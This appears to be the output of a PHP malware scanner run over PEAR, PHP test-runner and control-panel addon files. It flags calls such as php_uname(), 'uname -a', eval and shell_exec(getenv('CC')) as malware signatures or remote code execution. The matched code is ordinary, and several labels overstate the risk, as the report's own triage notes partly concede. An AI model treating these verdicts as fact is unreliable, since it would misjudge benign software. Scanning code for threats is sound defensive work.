exec($this->config->get('php_prefix') . "php-config" . $this->config->get('php_suffix') . " --prefix"); $this->_harvestInstDir($prefix, $inst_dir . DIRECTORY_SEPARATOR . $prefix, $built_files); chdir($old_cwd); return $built_files; } function phpizeCallback($what, $data) { if ($what != 'cmdoutput') { return; } $this->log(1, rtrim($data)); if (preg_match('/You should update your .aclocal.m4/', $data)) { return; } $matches = array(); if (preg_match('/^\s+(\S[^:]+):\s+(\d{8})/', $data, $matches)) {...
|
|
//opt/php71/share/pear/PEAR/Dependency2.php Size: 49.26 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 276 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php71/share/pear/PEAR/DependencyDB.php Size: 23.49 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 476 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php71/share/pear/PEAR/Registry.php Size: 73.86 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 813 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php71/share/pear/PEAR/RunTest.php Size: 35.12 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Warns: 5
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2], 0, -1) : $split[2]; $array = array($key => array('operator' => $split[0], 'value' => $value)); retu...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2]...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($commandline, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ), $pipes, null, $env, array('suppress_errors' => true)); if (!$proc) { return false; } if (is_string($stdin)) { fwrite($pipes[0], $stdin); } fclose($pipes[0]); while (true) { $r = $pipes; $e = $w = null; $n = @stream_select($r, $w, $e, 60); if ($n === 0) { $data .= "\n ** ERROR: process timed out **\n"; proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = frea...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } if (function_exists('proc_get_status')) { $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { retur...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($cmd, $return_value); $out = ob_get_contents(); ob_end_clean(); $section_text['RETURNS'] = (int) trim($section_text['RETURNS']); $returnfail = ($return_value != $section_text['RETURNS']); } else { $returnfail = false; $stdin = isset($section_text['STDIN']) ? $section_text['STDIN'] : null; $out = $this->system_with_timeout($cmd, $env, $stdin); $return_value = $out[0]; $out = $out[1]; } $output = preg_replace('/\r\n/', "\n", trim($out)); if (isset($tmp_post) && realpath($tmp_post) && file_e...
|
|
//opt/php71/share/pear/PEAR/Installer.php Size: 68.23 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$to = $a[to];"); } else { if (!isset($options['soft'])) { $this->log(0, "invalid php-const replacement: $a[to]"); } continue; } } elseif ($a['type'] == 'pear-config') { if ($a['to'] == 'master_server') { $chan = $this->_registry->getChannel($channel); if (!PEAR::isError($chan)) { $to = $chan->getServer(); } else { $to = $this->config->get($a['to'], null, $channel); } } else { $to = $this->config->get($a['to'], null, $channel); } if (is_null($to)) { if (!isset($options['soft'])) { $this->l...
|
|
//opt/php71/share/pear/PEAR/ErrorStack.php Size: 33.01 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function() code'; } else { $ret['function'] = $funcbacktrace['function']; } } } if (isset($funcbacktrace['class']) && isset($backtrace[1])) { $ret['class'] = $funcbacktrace['class']; } return $ret; } return false; } public static function getErrorMessage(&$stack, $err, $template = false) { if ($template) { $mainmsg = $template; } else { $mainmsg = $stack->getErrorMessageTemplate($err['code']); } $mainmsg = str_replace('%__msg%', $err['message'], $mainmsg); if (is_array($err['params']) && ...
|
|
//opt/php71/share/pear/pearcmd.php Size: 14.68 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 415 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php71/share/pear/Archive/Tar.php Size: 83.18 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($v_info[4]); $groupinfo = posix_getgrgid($v_info[5]); $v_uname = $userinfo['name']; $v_gname = $groupinfo['name']; } else { $v_uname = ''; $v_gname = ''; } $v_devmajor = ''; $v_devminor = ''; $v_prefix = ''; $v_binary_data_first = pack( "a100a8a8a8a12a12", $v_reduced_filename, $v_perms, $v_uid, $v_gid, $v_size, $v_mtime ); $v_binary_data_last = pack( "a1a100a6a2a32a32a8a8a155a12", $v_typeflag, $v_linkname, $v_magic, $v_version, $v_uname, $v_gname, $v_devmajor, $v_devminor, $v_pref...
|
|
//opt/php71/share/pear/OS/Guess.php Size: 10.34 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 19 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a915f4c2 Line: 19 Dangerous Malware Signature (hash: a915f4c2) |
uname -a
|
|
//opt/php71/lib/php/php/build/run-tests.php Size: 80.67 kB Created: 2021-11-01 20:26:11 Modified: 2022-01-04 22:25:23 Warns: 7 Dangers: 4
| Description | Match |
|---|
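Exploit execution Line: 393 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]. Triage note: the matched call builds its command from the `PHP_AUTOCONF` environment variable, so exposure depends on who controls that process's environment and on whether this script is reachable from the web at all. |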
shell_exec(getenv('PHP_AUTOCONF')
| Exploit execution Line: 413 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
system(getenv('CC')
| Exploit execution Line: 415 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('CC')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($section_text['REDIRECTTEST']); $IN_REDIRECT['via'] = "via [$shortname]\n\t"; $IN_REDIRECT['dir'] = realpath(dirname($file)); $IN_REDIRECT['prefix'] = trim($section_text['TEST']); if (count($IN_REDIRECT['TESTS']) == 1) { if (is_array($org_file)) { $test_files[] = $org_file[1]; } else { $GLOBALS['test_files'] = $test_files; find_files($IN_REDIRECT['TESTS']); foreach($GLOBALS['test_files'] as $f) { $test_files[] = array($f, $file); } } $test_cnt += @count($test_files) - 1; $test_idx--; show_r...
| Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $php, $test_cnt, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_tested) { $name = $name[0]; } } else if ($redir_tested) { $index = "# $redir_tested: $name"; } else { $index = $name; } $test_idx++; $result = run_test($php, $name, $env); if (!is_array($name) && $result != 'REDIR') { $test_result...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig'] . "\n"; } if ($stat["exitcode"] > 128 && $stat["exitcode"] < 160) { $data .= "\nTermsig=" . ($stat["exitcode"] - 128) . "\n"; } $code = proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $php, $test_cnt, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_test...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open() is available. | | Please check if you disabled it in php.ini. | +-----------------------------------------------------------+
NO_PROC_OPEN_ERROR; exit(1); } if (ini_get('date.timezone') == '') { date_default_timezone_set('UTC'); } $CUR_DIR = getcwd(); if (getenv('TEST_PHP_SRCDIR')) { @chdir(getenv('TEST_PHP_SRCDIR')); } putenv('SSH_CLIENT=deleted'); putenv('SSH_AUTH_SOCK=deleted'); putenv('SSH_TTY=deleted'); putenv('SSH_CONNECTION=deleted'); $cwd = getcwd(); set_tim...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc, 9); return $data; } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig'] . "\n"; } if ($stat["exitcode"] > 128 && $stat["exitcode"] < 160) { $data .= "\nTermsig=" . ($stat["exitcode"] - 128) . "\n"; } $code = proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_resu...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec(getenv('PHP_AUTOCONF') . ' --version'); } else { $autoconf = shell_exec('autoconf --version'); } $libtool = shell_exec($CUR_DIR . '/libtool --version'); $sys_libtool_path = shell_exec(__DIR__ . '/build/shtool path glibtool libtool'); if ($sys_libtool_path) { $sys_libtool = shell_exec(str_replace("\n", "", $sys_libtool_path) . ' --version'); } $flags = array('-v', '-V', '--version'); $cc_status = 0; foreach($flags AS $flag) { system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status);...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status); if ($cc_status == 0) { $compiler = shell_exec(getenv('CC') . " $flag 2>&1"); break; } } $ldd = shell_exec("ldd $php 2>/dev/null"); } $failed_tests_data .= "Autoconf:\n$autoconf\n"; $failed_tests_data .= "Bundled Libtool:\n$libtool\n"; $failed_tests_data .= "System Libtool:\n$sys_libtool\n"; $failed_tests_data .= "Compiler:\n$compiler\n"; $failed_tests_data .= "Bison:\n". shell_exec('bison --version 2>/dev/null') . "\n"; $failed_tests_d...
| Sign 963e968a Line: 250 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php74/share/pear/PEAR.php Size: 35.32 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$e = new Exception($this->message, $this->code);throw($e);'); } } public function PEAR_Error( $message = 'unknown error', $code = null, $mode = null, $options = null, $userinfo = null ) { self::__construct($message, $code, $mode, $options, $userinfo); } function getMode() { return $this->mode; } function getCallback() { return $this->callback; } function getMessage() { return ($this->error_message_prefix . $this->message); } function getCode() { return $this->code; } function getType() { r...
|
|
//opt/php74/share/pear/PEAR/Builder.php Size: 18.50 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($this->config->get('php_prefix') . "php-config" . $this->config->get('php_suffix') . " --prefix"); $this->_harvestInstDir($prefix, $inst_dir . DIRECTORY_SEPARATOR . $prefix, $built_files); chdir($old_cwd); return $built_files; } function phpizeCallback($what, $data) { if ($what != 'cmdoutput') { return; } $this->log(1, rtrim($data)); if (preg_match('/You should update your .aclocal.m4/', $data)) { return; } $matches = array(); if (preg_match('/^\s+(\S[^:]+):\s+(\d{8})/', $data, $matches)) {...
|
|
//opt/php74/share/pear/PEAR/Dependency2.php Size: 49.26 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 276 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php74/share/pear/PEAR/DependencyDB.php Size: 23.60 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 478 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php74/share/pear/PEAR/Registry.php Size: 74.03 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 814 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php74/share/pear/PEAR/RunTest.php Size: 35.14 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Warns: 5
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2], 0, -1) : $split[2]; $array = array($key => array('operator' => $split[0], 'value' => $value)); retu...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2]...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($commandline, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ), $pipes, null, $env, array('suppress_errors' => true)); if (!$proc) { return false; } if (is_string($stdin)) { fwrite($pipes[0], $stdin); } fclose($pipes[0]); while (true) { $r = $pipes; unset($r[0]); $e = $w = []; $n = @stream_select($r, $w, $e, 60); if ($n === 0) { $data .= "\n ** ERROR: process timed out **\n"; proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { ...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } if (function_exists('proc_get_status')) { $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { retur...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($cmd, $return_value); $out = ob_get_contents(); ob_end_clean(); $section_text['RETURNS'] = (int) trim($section_text['RETURNS']); $returnfail = ($return_value != $section_text['RETURNS']); } else { $returnfail = false; $stdin = isset($section_text['STDIN']) ? $section_text['STDIN'] : null; $out = $this->system_with_timeout($cmd, $env, $stdin); $return_value = $out[0]; $out = $out[1]; } $output = preg_replace('/\r\n/', "\n", trim($out)); if (isset($tmp_post) && realpath($tmp_post) && file_e...
|
|
//opt/php74/share/pear/PEAR/Installer.php Size: 68.43 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$to = $a[to];"); } else { if (!isset($options['soft'])) { $this->log(0, "invalid php-const replacement: $a[to]"); } continue; } } elseif ($a['type'] == 'pear-config') { if ($a['to'] == 'master_server') { $chan = $this->_registry->getChannel($channel); if (!PEAR::isError($chan)) { $to = $chan->getServer(); } else { $to = $this->config->get($a['to'], null, $channel); } } else { $to = $this->config->get($a['to'], null, $channel); } if (is_null($to)) { if (!isset($options['soft'])) { $this->l...
|
|
//opt/php74/share/pear/PEAR/ErrorStack.php Size: 33.01 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function() code'; } else { $ret['function'] = $funcbacktrace['function']; } } } if (isset($funcbacktrace['class']) && isset($backtrace[1])) { $ret['class'] = $funcbacktrace['class']; } return $ret; } return false; } public static function getErrorMessage(&$stack, $err, $template = false) { if ($template) { $mainmsg = $template; } else { $mainmsg = $stack->getErrorMessageTemplate($err['code']); } $mainmsg = str_replace('%__msg%', $err['message'], $mainmsg); if (is_array($err['params']) && ...
|
|
//opt/php74/share/pear/pearcmd.php Size: 14.49 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 409 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php74/share/pear/Archive/Tar.php Size: 86.26 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($v_info[4]); $groupinfo = posix_getgrgid($v_info[5]); if (isset($userinfo['name'])) { $v_uname = $userinfo['name']; } if (isset($groupinfo['name'])) { $v_gname = $groupinfo['name']; } } $v_devmajor = ''; $v_devminor = ''; $v_prefix = ''; $v_binary_data_first = pack( "a100a8a8a8a12a12", $v_reduced_filename, $v_perms, $v_uid, $v_gid, $v_size, $v_mtime ); $v_binary_data_last = pack( "a1a100a6a2a32a32a8a8a155a12", $v_typeflag, $v_linkname, $v_magic, $v_version, $v_uname, $v_gname, $v_...
|
|
//opt/php74/share/pear/OS/Guess.php Size: 11.25 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 19 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a915f4c2 Line: 19 Dangerous Malware Signature (hash: a915f4c2) |
uname -a
|
|
//opt/php74/lib/php/php/build/run-tests.php Size: 124.08 kB Created: 2021-11-18 13:52:48 Modified: 2022-01-04 22:25:25 Warns: 7 Dangers: 4
| Description | Match |
|---|
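Exploit execution Line: 1003 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]. Triage note: the matched call builds its command from the `CC` environment variable, so exposure depends on who controls that process's environment and on whether this script is reachable from the web at all. |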
system(getenv('CC')
| Exploit execution Line: 1005 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('CC')
| Exploit execution Line: 983 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('PHP_AUTOCONF')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($section_text['REDIRECTTEST']); $IN_REDIRECT['via'] = "via [$shortname]\n\t"; $IN_REDIRECT['dir'] = realpath(dirname($file)); $IN_REDIRECT['prefix'] = trim($section_text['TEST']); if (!empty($IN_REDIRECT['TESTS'])) { if (is_array($org_file)) { $test_files[] = $org_file[1]; } else { $GLOBALS['test_files'] = $test_files; find_files($IN_REDIRECT['TESTS']); foreach ($GLOBALS['test_files'] as $f) { $test_files[] = array($f, $file); } } $test_cnt += count($test_files) - 1; $test_idx--; show_redir...
| Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $result_tests_file, $php, $test_idx; global $PHP_FAILED_TESTS, $workers, $workerID, $workerSock; if ($workers !== null && !$workerID) { run_all_tests_parallel($test_files, $env, $redir_tested); return; } foreach ($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_tested) { $name = $name[0]; } } else if ($redir_teste...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig'] . "\n"; } if ($stat["exitcode"] > 128 && $stat["exitcode"] < 160) { $data .= "\nTermsig=" . ($stat["exitcode"] - 128) . "\n"; } else if (defined('PHP_WINDOWS_VERSION_MAJOR') && (($stat["exitcode"] >> 28) & 0b1111) === 0b1100) { $data .= "\nTermsig=" . $stat["exitcode"] . "\n"; } proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open() is available. | | Please check if you disabled it in php.ini. | +-----------------------------------------------------------+
NO_PROC_OPEN_ERROR; exit(1); } if (ini_get('date.timezone') == '') { date_default_timezone_set('UTC'); } putenv('SSH_CLIENT=deleted'); putenv('SSH_AUTH_SOCK=deleted'); putenv('SSH_TTY=deleted'); putenv('SSH_CONNECTION=deleted'); set_time_limit(0); ini_set('pcre.backtrack_limit', PHP_INT_MAX); while (@ob_end_clean()) { ; } if (ob_get_level()) ...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc, 9); return $data; } else if ($n > 0) { if ($captureStdOut) { $line = fread($pipes[1], 8192); } elseif ($captureStdErr) { $line = fread($pipes[2], 8192); } else { $line = ''; } if (strlen($line) == 0) { break; } $data .= $line; } } $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig'] . "\n"; } if ($stat["exitcode"] > 128 && $stat["exitcode"] < 160) { $data .= "\nTermsig=" . ($stat["exitcode"] - 128) . "\n"; } else if (defined('PHP...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec(getenv('PHP_AUTOCONF') . ' --version'); } else { $autoconf = shell_exec('autoconf --version'); } $libtool = shell_exec(INIT_DIR . '/libtool --version'); $sys_libtool_path = shell_exec(__DIR__ . '/build/shtool path glibtool libtool'); if ($sys_libtool_path) { $sys_libtool = shell_exec(str_replace("\n", "", $sys_libtool_path) . ' --version'); } $flags = array('-v', '-V', '--version'); $cc_status = 0; foreach ($flags as $flag) { system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status)...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status); if ($cc_status == 0) { $compiler = shell_exec(getenv('CC') . " $flag 2>&1"); break; } } $ldd = shell_exec("ldd $php 2>/dev/null"); } $failed_tests_data .= "Autoconf:\n$autoconf\n"; $failed_tests_data .= "Bundled Libtool:\n$libtool\n"; $failed_tests_data .= "System Libtool:\n$sys_libtool\n"; $failed_tests_data .= "Compiler:\n$compiler\n"; $failed_tests_data .= "Bison:\n" . shell_exec('bison --version 2>/dev/null') . "\n"; $failed_tests_...
| Sign 963e968a Line: 844 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/siteprobuilder_files/siteprobuilder.php Size: 15.62 kB Created: 2020-11-23 10:48:09 Modified: 2021-01-20 22:41:09 Warns: 1
| Description | Match |
|---|
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec('nslookup '.$host.' 8.8.8.8'), "\n\r"); if (preg_match('#(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})$#iuU', $out, $m) && isset($m[1])) { $ip = $m[1]; } } } } return $ip; } private static function getDomainData($name = null) { if (!self::$domainData || !is_array(self::$domainData)) { $domain = self::getDomain(); $result = API::call('webdomain', array( 'su' => self::getUser(), 'elid' => $domain )); $data = array(); foreach ($result->elem as $elem) { if ((string) $elem->name == $domain || (($at...
|
|
//usr/local/mgr5/addon/revisium_antivirus/common.php Size: 12.14 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
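Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder (a module/library for protected functions) that is often used to obfuscate malicious code [https://www.ioncube.com]. Triage note: the match is the `ioncube_loader` reference on line 2, so the rule reports that the file is encoded rather than any behaviour of its contents; the file's provenance has to settle whether it is legitimate. |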
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/ra_addon.php Size: 31.96 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder (a module/library for protected functions) that is often used to obfuscate malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/update.php Size: 4.06 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder (a module/library for protected functions) that is often used to obfuscate malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/email_checker.php Size: 2.94 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder (a module/library for protected functions) that is often used to obfuscate malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/queue.php Size: 4.80 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder (a module/library for protected functions) that is often used to obfuscate malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/post_install.php Size: 3.97 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder (a module/library for protected functions) that is often used to obfuscate malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/tools_update.php Size: 2.74 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder (a module/library for protected functions) that is often used to obfuscate malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/send_stats.php Size: 3.72 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder (a module/library for protected functions) that is often used to obfuscate malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
